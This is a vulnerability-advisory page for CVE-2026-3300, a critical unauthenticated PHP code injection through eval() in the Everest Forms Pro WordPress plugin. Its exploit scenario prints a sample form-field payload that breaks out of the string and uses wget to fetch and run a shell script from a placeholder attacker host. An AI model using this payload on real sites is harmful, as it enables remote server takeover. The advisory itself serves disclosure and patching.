Skip to main content

PHP EUVD-2026-17275

| CVE-2026-3300 CRITICAL
Code Injection (CWE-94)
2026-03-31 Wordfence
9.8
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

4
Re-analysis Queued
Apr 24, 2026 - 18:22 vuln.today
cvss_changed
EUVD ID Assigned
Mar 31, 2026 - 01:45 euvd
EUVD-2026-17275
Analysis Generated
Mar 31, 2026 - 01:45 vuln.today
CVE Published
Mar 31, 2026 - 01:24 nvd
CRITICAL 9.8

DescriptionCVE.org

The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.

AnalysisAI

Remote code execution in Everest Forms Pro plugin for WordPress ≤1.9.12 allows unauthenticated attackers to execute arbitrary PHP code on the server via the Complex Calculation feature. Attackers can inject malicious PHP through any string-type form field (text, email, URL, select, radio) due to unsafe concatenation into eval() without proper escaping. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Submit crafted form field value
Exploit
Bypass sanitize_text_field() with PHP code
Execution
Inject payload into eval() string
Impact
Execute arbitrary PHP code on server

Vulnerability AssessmentAI

Exploitation Everest Forms Pro plugin for WordPress versions up to 1.9.12 with Calculation Addon enabled. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment This represents an exceptionally high real-world risk. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An unauthenticated attacker identifies a WordPress site running Everest Forms Pro with a publicly accessible contact or registration form using the Complex Calculation feature. The attacker crafts a malicious form submission where a text field contains the payload: test'); system('wget http://attacker.com/shell.php -O /tmp/shell.php; php /tmp/shell.php'); // to break out of the string context and inject arbitrary commands. …
Remediation Immediately upgrade to the latest patched version of Everest Forms Pro. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all WordPress installations using Everest Forms Pro ≤1.9.12 via plugin inventory audit; disable or deactivate the plugin immediately across all affected systems. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-17275 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy